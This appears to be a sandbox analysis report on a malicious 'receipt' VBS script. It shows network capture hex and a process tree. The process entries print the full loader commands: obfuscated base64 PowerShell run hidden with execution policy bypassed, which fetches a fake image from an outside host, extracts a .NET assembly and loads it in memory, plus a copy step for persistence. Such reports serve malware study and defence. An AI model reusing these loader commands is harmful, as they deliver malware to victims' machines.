2024-05-04 07:50:53 UTC	8000	IN	Data Raw: 75 41 68 6d 43 6b 54 42 6f 41 42 6a 43 45 54 42 69 41 42 69 43 45 43 41 54 45 67 4e 41 45 6d 41 4a 46 67 4e 43 45 43 41 41 44 42 65 42 45 56 42 54 38 51 2b 43 45 52 42 4d 45 67 4e 43 45 52 42 47 38 67 79 43 6b 41 42 34 2f 67 6b 43 45 41 42 6d 4c 51 54 42 45 50 42 67 2f 67 64 42 6b 50 42 51 7a 77 4d 42 45 43 41 78 4a 51 54 42 6b 48 41 39 2f 77 51 42 45 46 41 78 39 77 4d 42 6b 4f 42 4b 2f 51 4a 42 45 46 42 45 2f 51 44 42 45 43 41 78 35 67 2f 42 45 4f 41 41 37 51 38 42 45 46 41 54 45 67 4e 42 45 4f 42 38 35 41 34 42 6b 4e 42 78 47 67 4e 41 45 6b 41 47 45 67 4e 42 6b 4b 42 69 4f 67 31 41 45 6a 41 47 45 67 4e 41 45 4a 42 63 36 41 76 41 45 44 42 58 36 67 73 42 6b 45 42 53 36 77 6e 41 45 44 42 53 36 51 69 41 45 44 41 54 45 67 4e 41 6b 44 42 46 47 67 4e 41 45 7a Data Ascii: uAhmCkTBoABjCETBiABiCECATEgNAEmAJFgNCECAADBeBEVBT8Q+CERBMEgNCERBG8gyCkAB4/gkCEABmLQTBEPBg/gdBkPBQzwMBECAxJQTBkHA9/wQBEFAx9wMBkOBK/QJBEFBE/QDBECAx5g/BEOAA7Q8BEFATEgNBEOB85A4BkNBxGgNAEkAGEgNBkKBiOg1AEjAGEgNAEJBc6AvAEDBX6gsBkEBS6wnAEDBS6QiAEDATEgNAkDBFGgNAEz
2024-05-04 07:50:53 UTC	8000	IN	Data Raw: 41 59 43 4b 48 34 74 43 41 41 67 4a 6f 6f 41 63 41 77 51 39 79 70 41 41 41 51 43 4b 5a 34 39 47 65 72 67 42 41 41 51 58 6f 6f 41 41 41 4d 46 4b 48 49 61 41 41 41 77 6a 4d 71 41 41 42 67 77 62 4b 41 51 41 48 4d 6e 43 41 45 67 42 6f 6f 41 41 42 55 41 4b 61 63 67 6f 4b 41 41 41 50 68 53 47 48 49 71 43 41 41 67 57 6f 67 78 42 69 71 41 41 41 77 45 4b 58 63 67 6f 42 41 41 41 70 78 6f 43 41 45 41 42 6f 59 78 42 4c 45 41 41 41 4d 51 6a 62 45 42 41 41 51 44 41 41 41 77 63 41 4d 41 4d 62 6f 69 42 41 73 69 43 4b 41 41 41 34 2f 6d 41 4b 41 51 41 44 67 53 45 41 41 77 4d 41 41 41 41 51 41 67 41 77 4d 68 4b 47 41 77 4b 4b 6f 41 41 41 34 38 62 43 6f 41 41 42 4d 41 4b 52 41 41 41 79 41 41 41 41 41 42 41 43 41 7a 45 42 41 41 41 6e 77 41 41 72 73 43 41 41 41 41 41 41 41 41 Data Ascii: AYCKH4tCAAgJooAcAwQ9ypAAAQCKZ49GergBAAQXooAAAMFKHIaAAAwjMqAABgwbKAQAHMnCAEgBooAABUAKacgoKAAAPhSGHIqCAAgWogxBiqAAAwEKXcgoBAAApxoCAEABoYxBLEAAAMQjbEBAAQDAAAwcAMAMboiBAsiCKAAA4/mAKAQADgSEAAwMAAAAQAgAwMhKGAwKKoAAA48bCoAABMAKRAAAyAAAAABACAzEBAAAnwAArsCAAAAAAAA
2024-05-04 07:50:53 UTC	7804	IN	Data Raw: 4b 41 41 41 4d 69 69 42 41 41 77 57 6f 59 41 41 41 45 47 4b 4b 41 41 41 70 39 57 44 52 6f 41 41 41 77 49 4b 45 41 41 41 5a 34 6e 43 41 41 41 6a 6f 59 41 41 41 77 46 4b 4b 41 41 41 4d 69 43 42 41 41 51 47 2b 42 48 41 46 45 6b 63 4b 41 41 41 63 2b 6d 43 41 41 77 6d 6f 30 51 45 4f 45 68 43 41 41 67 6d 76 68 42 46 52 6f 41 41 41 6b 4a 4b 4b 41 41 41 56 2b 47 44 52 6f 41 41 41 51 35 62 4d 45 68 46 57 51 68 45 56 45 68 43 41 41 51 6d 6f 41 41 41 41 77 4a 49 41 41 51 41 41 41 69 46 57 55 68 45 4d 45 78 43 52 73 77 45 4b 41 41 41 54 69 69 44 52 34 77 45 4b 41 41 41 59 4f 48 41 41 41 41 6e 67 41 41 41 42 41 41 49 4e 4d 68 43 41 41 51 51 7a 70 41 41 41 63 35 62 41 77 4d 41 67 41 53 43 52 59 68 46 57 59 42 43 52 6f 41 41 41 59 4a 4b 4b 41 41 41 56 2b 47 44 52 6f 41 Data Ascii: KAAAMiiBAAwWoYAAAEGKKAAAp9WDRoAAAwIKEAAAZ4nCAAAjoYAAAwFKKAAAMiCBAAQG+BHAFEkcKAAAc+mCAAwmo0QEOEhCAAgmvhBFRoAAAkJKKAAAV+GDRoAAAQ5bMEhFWQhEVEhCAAQmoAAAAwJIAAQAAAiFWUhEMExCRswEKAAATiiDR4wEKAAAYOHAAAAngAAABAAINMhCAAQQzpAAAc5bAwMAgASCRYhFWYBCRoAAAYJKKAAAV+GDRoA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.3	49735	20.12.23.50	443

Timestamp	Bytes transferred	Direction	Data
2024-05-04 07:50:55 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.3448/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.3031&MK=ATnOdpEYx+LGGt1&MD=BL1LyFpe HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-05-04 07:50:56 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160" MS-CorrelationId: 865548fb-54bf-4bb1-9929-46d63bb1a99f MS-RequestId: e8e385df-be12-4a4d-987d-7b869218b805 MS-CV: 7B6hWMfj8EWWLOCt.0 X-Microsoft-SLSClientCache: 2160 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sat, 04 May 2024 07:50:55 GMT Connection: close Content-Length: 25457
2024-05-04 07:50:56 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-05-04 07:50:56 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Target ID:	0
Start time:	09:49:53
Start date:	04/05/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\E7236252-receipt.vbs"
Imagebase:	0x7ff670170000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:50:17
Start date:	04/05/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreeQBhDgTreG0DgTrebwB3DgTreHgDgTreLwBtDgTreG4DgTreLwBtDgTreG8DgTreYwDgTreuDgTreDcDgTreMgBlDgTreHYDgTrebDgTreBvDgTreHYDgTreZQDgTreuDgTreHcDgTredwB3DgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreG0DgTrebwBxDgTreHUDgTreZQBuDgTreHEDgTredQBlDgTreGkDgTrecgBvDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreFMDgTredgBjDgTreHMDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
Imagebase:	0x7ff6f70b0000
File size:	486'400 bytes
MD5 hash:	DFD66604CA0898E8E26DF7B1635B6326
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:50:17
Start date:	04/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff720030000
File size:	873'472 bytes
MD5 hash:	7366FBEFE66BA0F1F5304F7D6FEF09FE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:50:18
Start date:	04/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Imagebase:	0x7ff7c89f0000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	09:50:19
Start date:	04/05/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff743e40000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	09:50:19
Start date:	04/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1836,i,15139392700974412451,17984429462301809972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff7c89f0000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	09:50:29
Start date:	04/05/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))} }"
Imagebase:	0x7ff6f70b0000
File size:	486'400 bytes
MD5 hash:	DFD66604CA0898E8E26DF7B1635B6326
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:50:50
Start date:	04/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\moquenqueiro.vbs"
Imagebase:	0x7ff65b150000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	09:50:50
Start date:	04/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff720030000
File size:	873'472 bytes
MD5 hash:	7366FBEFE66BA0F1F5304F7D6FEF09FE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	09:50:54
Start date:	04/05/2024
